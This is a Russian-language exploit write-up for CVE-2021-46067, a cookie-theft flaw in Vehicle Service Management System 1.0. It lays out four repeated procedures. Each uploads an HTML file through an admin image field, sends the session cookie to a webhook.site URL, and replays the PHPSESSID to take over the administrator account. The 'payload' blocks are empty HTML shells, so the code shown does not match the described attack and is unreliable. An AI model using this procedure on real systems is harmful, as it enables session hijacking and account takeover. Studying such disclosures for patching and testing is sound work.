CVE-2021-46067
Название эксплойта: Vehicle Service Management System - 'Multiple' Кража куки приводит к полному захвату учетной записи
Автор эксплойта: SANU P.L
CVE: CVE-2021-46067
CVSS: 9.8 КРИТИЧЕСКИЙ
Ссылки:
Описание:
В Vehicle Service Management System 1.0 злоумышленник может украсть куки, что приводит к полному захвату учетной записи.
1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)
Эксплойт:
- Войдите в панель администратора http://localhost/vehicle_service/admin
- Перейдите в раздел «Моя учетная запись» http://localhost/vehicle_service/admin/?page=user
- Сгенерируйте URL-адрес Webhook - https://webhook.site
- Скопируйте уникальный URL-адрес Webhook и вставьте его в приведенный ниже HTML-код.
Полезная нагрузка:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Сохраните приведенный выше HTML-код, например: Cookie Stealing.html
- В разделе «Моя учетная запись» введите все необходимые данные и выберите HTML-файл в поле «Аватар».
- Нажмите кнопку «Обновить».
- Откройте изображение аватара в новой вкладке и проверьте статус Webhook.
- Мы получили запрос, он содержит PHPSESSID.
- Скопируйте значение PHPSESSID и откройте любой другой браузер.
- Перейдите в панель администратора http://localhost/vehicle_service/admin
- Проверьте значения куки и измените значение PHPSESSID на скопированное.
- Теперь откройте панель администратора http://localhost/vehicle_service/admin
- Успешный вход в учетную запись. Захват учетной записи выполнен успешно.
2. Vehicle Service Management System - 'Список пользователей' (/admin/?page=user/manage_user)
Эксплойт:
- Войдите в панель администратора http://localhost/vehicle_service/admin
- Перейдите в раздел «Список пользователей» и нажмите кнопку «Создать нового».
- Сгенерируйте URL-адрес Webhook - https://webhook.site
- Скопируйте уникальный URL-адрес Webhook и вставьте его в приведенный ниже HTML-код.
Полезная нагрузка:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Сохраните приведенный выше HTML-код, например: Cookie Stealing.html
- В разделе «Создать нового пользователя» введите все необходимые данные и выберите HTML-файл в поле «Аватар».
- Нажмите кнопку «Сохранить».
- Откройте изображение аватара в новой вкладке и проверьте статус Webhook.
- Мы получили запрос, он содержит PHPSESSID.
- Скопируйте значение PHPSESSID и откройте любой другой браузер.
- Перейдите в панель администратора http://localhost/vehicle_service/admin
- Проверьте значения куки и измените значение PHPSESSID на скопированное.
- Теперь откройте панель администратора http://localhost/vehicle_service/admin
- Успешный вход в учетную запись. Захват учетной записи выполнен успешно.
3. Vehicle Service Management System - 'Настройки-Логотип системы' (/admin/?page=system_info)
Эксплойт:
- Войдите в панель администратора http://localhost/vehicle_service/admin
- Перейдите в раздел «Настройки» http://localhost/vehicle_service/admin/?page=system_info
- Сгенерируйте URL-адрес Webhook - https://webhook.site
- Скопируйте уникальный URL-адрес Webhook и вставьте его в приведенный ниже HTML-код.
Полезная нагрузка:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Сохраните приведенный выше HTML-код, например: Cookie Stealing.html
- В разделе «Настройки» введите все необходимые данные и выберите HTML-файл в поле «Логотип системы».
- Нажмите кнопку «Обновить».
- Откройте изображение логотипа системы в новой вкладке и проверьте статус Webhook.
- Мы получили запрос, он содержит PHPSESSID.
- Скопируйте значение PHPSESSID и откройте любой другой браузер.
- Перейдите в панель администратора http://localhost/vehicle_service/admin
- Проверьте значения куки и измените значение PHPSESSID на скопированное.
- Теперь откройте панель администратора http://localhost/vehicle_service/admin
- Успешный вход в учетную запись. Захват учетной записи выполнен успешно.
4. Vehicle Service Management System - 'Настройки-Обложка сайта' (/admin/?page=system_info)
Эксплойт:
- Войдите в панель администратора http://localhost/vehicle_service/admin
- Перейдите в раздел «Настройки» http://localhost/vehicle_service/admin/?page=system_info
- Сгенерируйте URL-адрес Webhook - https://webhook.site
- Скопируйте уникальный URL-адрес Webhook и вставьте его в приведенный ниже HTML-код.
Полезная нагрузка:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Сохраните приведенный выше HTML-код, например: Cookie Stealing.html
- В разделе «Настройки» введите все необходимые данные и выберите HTML-файл в поле «Обложка сайта».
- Нажмите кнопку «Обновить».
- Откройте изображение обложки сайта в новой вкладке и проверьте статус Webhook.
- Мы получили запрос, он содержит PHPSESSID.
- Скопируйте значение PHPSESSID и откройте любой другой браузер.
- Перейдите в панель администратора http://localhost/vehicle_service/admin
- Проверьте значения куки и измените значение PHPSESSID на скопированное.
- Теперь откройте панель администратора http://localhost/vehicle_service/admin
- Успешный вход в учетную запись. Захват учетной записи выполнен успешно.
Воздействие:
Злоумышленник загружает вредоносный HTML-файл, который перенаправляет на сторонний сайт, и куки становятся доступными в запросе. Это приводит к полному захвату учетной записи.
Смягчение:
Рекомендуется проверять функциональность загрузки файлов и выполнять вторичные проверки в сессии.